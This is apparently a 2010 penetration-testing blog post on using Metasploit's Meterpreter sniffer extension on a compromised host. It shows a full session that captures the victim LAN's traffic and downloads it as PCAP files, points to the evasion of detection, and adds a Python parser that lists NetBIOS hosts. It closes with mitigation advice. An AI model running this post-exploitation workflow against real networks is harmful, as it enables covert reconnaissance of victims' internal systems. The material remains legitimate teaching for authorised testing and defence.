Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foothold by compromising an initial host, one of the first things he needs to do is some basic host and network reconnaissance, in order to see "where he is" and "what he can do next".

One of the techniques that could be used is passive network reconnaissance, i.e. packet sniffing to "listen" to the victim's LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.

Please remember to use these techniques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN traffic can be very useful to an external attacker, to assist in information gathering and in compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as Wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile, so installing an application where it did not previously exist is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed and no files are written to disk; everything is stored in memory, and all communications between the attacker and the victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows:

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help

<......>

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself), and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check the progress of the collection by issuing a sniffer_stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
/root
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, to see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap

Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally, at our leisure, on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we can learn about the remote victim network.

Here we filter NetBIOS/SMB broadcast traffic to see what systems are visible on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN).

Other filters could be applied to other broadcast traffic, such as address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services such as file and print.

Using these methods, we can gather a list of live IP addresses, address ranges and machine types, and all of this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.
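The same inventory that the Wireshark filtering above produces can be pulled out of a capture programmatically, which is also how a defender would audit how much a segment leaks over broadcast before and after tightening it. The following Python is an added example, not code from the original post or from Metasploit: it reads a classic libpcap file (the container format that sniffer_dump writes), tallies broadcast frames by protocol, and decodes NetBIOS Name Service (UDP/137) questions into source address, host name and the service the suffix byte advertises. The function names, the suffix table and the three-frame sample capture are constructed for this example; the sample is built in memory so nothing here touches a real network.

```python
"""Audit what a LAN leaks via broadcast: parse a libpcap file (the format
sniffer_dump writes), tally broadcast frames by protocol and decode NetBIOS
Name Service queries. The capture built at the bottom is constructed."""
import struct
from collections import Counter

BROADCAST_MAC = b"\xff" * 6
NBNS_PORT = 137
# Well-known NetBIOS suffix bytes and the service they advertise.
NB_SUFFIX = {0x00: "workstation", 0x20: "file server", 0x1D: "master browser",
             0x1B: "domain master browser", 0x1E: "browser election"}


def decode_nb_name(encoded: bytes):
    """Decode a 32-char first-level NetBIOS name to (name, suffix byte)."""
    # Each raw byte travels as two letters: nibble n -> chr(ord('A') + n).
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii", "replace").rstrip(), raw[15]


def encode_nb_name(name: str, suffix: int) -> bytes:
    """Inverse of decode_nb_name; used to build the constructed sample."""
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def iter_pcap(data: bytes):
    """Yield raw Ethernet frames from a libpcap byte string (either endianness)."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}[data[:4]]
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet (LINKTYPE 1) captures are handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def analyse(pcap: bytes):
    """Return (Counter of broadcast frames by protocol, [(src_ip, name, role)])."""
    counts, names = Counter(), []
    for frame in iter_pcap(pcap):
        if frame[:6] != BROADCAST_MAC:
            continue  # unicast traffic is outside this audit
        ethertype = struct.unpack("!H", frame[12:14])[0]
        if ethertype == 0x0806:
            counts["arp"] += 1
            continue
        if ethertype != 0x0800 or len(frame) < 42 or frame[23] != 17:
            counts["other"] += 1  # not IPv4/UDP
            continue
        ihl = (frame[14] & 0x0F) * 4
        src_ip = ".".join(str(b) for b in frame[26:30])
        udp = frame[14 + ihl:]
        dport = struct.unpack("!H", udp[2:4])[0]
        payload = udp[8:]
        if dport in (67, 68):
            counts["dhcp"] += 1
        elif dport != NBNS_PORT:
            counts["other"] += 1
        else:
            counts["nbns"] += 1
            # 12-byte NBNS header, then a question: 0x20 length, 32 chars, 0x00.
            if len(payload) >= 46 and payload[12] == 0x20:
                name, suffix = decode_nb_name(payload[13:45])
                names.append((src_ip, name, NB_SUFFIX.get(suffix, f"0x{suffix:02x}")))
    return counts, names


def nbns_frame(src_mac: bytes, src_ip: bytes, name: str, suffix: int) -> bytes:
    """Constructed Ethernet/IPv4/UDP frame carrying one broadcast NBNS query."""
    question = b"\x20" + encode_nb_name(name, suffix) + b"\x00\x00\x20\x00\x01"
    nbns = struct.pack("!HHHHHH", 0x1234, 0x0110, 1, 0, 0, 0) + question
    udp = struct.pack("!HHHH", NBNS_PORT, NBNS_PORT, 8 + len(nbns), 0) + nbns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 1, 0, 64, 17, 0,
                     src_ip, b"\xc0\xa8\x01\xff") + udp  # to 192.168.1.255
    return BROADCAST_MAC + src_mac + b"\x08\x00" + ip


def build_sample_pcap() -> bytes:
    """Constructed capture: two Windows-style hosts plus one ARP request."""
    frames = [
        nbns_frame(b"\x00\x0c\x29\x00\x00\x01", b"\xc0\xa8\x01\x0a", "WS-FINANCE01", 0x00),
        nbns_frame(b"\x00\x0c\x29\x00\x00\x02", b"\xc0\xa8\x01\x14", "FILESRV", 0x20),
        BROADCAST_MAC + b"\x00\x0c\x29\x00\x00\x03" + b"\x08\x06" + b"\x00" * 28,
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1290816000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    counts, names = analyse(build_sample_pcap())
    print("broadcast frames by protocol:", dict(counts))
    for src, name, role in names:
        print(f"{src:15} {name:15} {role}")
```

To run it against one of the files from the session above, replace build_sample_pcap() with the bytes read from, say, test1.pcap. Only the question section of each NBNS packet is decoded, which is enough to name the host and its role; the per-protocol counts are the number a network owner should watch shrink once broadcast limiting and segmentation from the Mitigation section are in place.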

Mitigation

Once a single system is compromised, it is only a short time before an attacker can gather enough local information to "pivot" and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts and test systems, as these could also be used as a bridgehead from which to silently sniff or attack other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalling and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.
